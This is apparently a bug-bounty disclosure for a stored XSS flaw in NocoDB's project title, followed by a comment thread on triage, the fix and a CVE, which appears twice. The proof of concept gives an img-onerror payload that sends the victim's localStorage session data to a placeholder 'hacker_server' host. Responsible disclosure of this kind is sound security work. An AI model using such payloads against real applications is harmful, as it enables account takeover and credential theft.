Account takeover due to stored XSS in "Project Title" in nocodb/nocodb

Valid

Reported on

Jun 3rd 2022

Description

The Project "Title" of the NocoDB application is vulnerable to stored xss which can leads to admin account takeover.

Proof of Concept

Login with low privileged users and Click on "New Project" then click on "Create"

Now write the payload <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")> and again click on "Create"

Then login from super admin account and "delete" the created project  <img src=x onerror=this.src="http://hacker_server:port/?"+localStorage.getItem("vuex")>

poc video

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Impact

Can takeover all users account.

We are processing your report and will contact the nocodb team within 24 hours. a year ago

Raj modified the report

a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

Raj

commented a year ago

Researcher

Hello @admin the maintainer has provided the email id so can you pls invite them to this report

We have contacted a member of the nocodb team and are waiting to hear back a year ago

Jamie Slome

commented a year ago

Admin

Sorted 👍

Raj modified the report

a year ago

Raj modified the report

a year ago

Raj

commented a year ago

Researcher

@admin Pls send them the updated report

Raj

commented a year ago

Researcher

@admin here is the poc video: ``` https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Raj

commented a year ago

Researcher

@admin here is the poc video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

of account takover.

navi validated this vulnerability a year ago

Raj has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

navi marked this as fixed in Will be shipped in > 0.91.7 with commit ffad5a a year ago

navi has been awarded the fix bounty

This vulnerability will not receive a CVE

Raj

commented a year ago

Researcher

@admin The fix is deployed so can you pls assign the cve?

Jamie Slome

commented a year ago

Admin

The CVE has been assigned and should be published soon 👍

to join this conversation

We are processing your report and will contact the nocodb team within 24 hours. a year ago

Raj modified the report

a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

Raj

commented a year ago

Researcher

Hello @admin the maintainer has provided the email id so can you pls invite them to this report

We have contacted a member of the nocodb team and are waiting to hear back a year ago

Jamie Slome

commented a year ago

Admin

Sorted 👍

Raj modified the report

a year ago

Raj modified the report

a year ago

Raj

commented a year ago

Researcher

@admin Pls send them the updated report

Raj

commented a year ago

Researcher

@admin here is the poc video: ``` https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

Raj

commented a year ago

Researcher

@admin here is the poc video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing

of account takover.

navi validated this vulnerability a year ago

Raj has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

navi marked this as fixed in Will be shipped in > 0.91.7 with commit ffad5a a year ago

navi has been awarded the fix bounty

This vulnerability will not receive a CVE

Raj

commented a year ago

Researcher

@admin The fix is deployed so can you pls assign the cve?

Jamie Slome

commented a year ago

Admin

The CVE has been assigned and should be published soon 👍

to join this conversation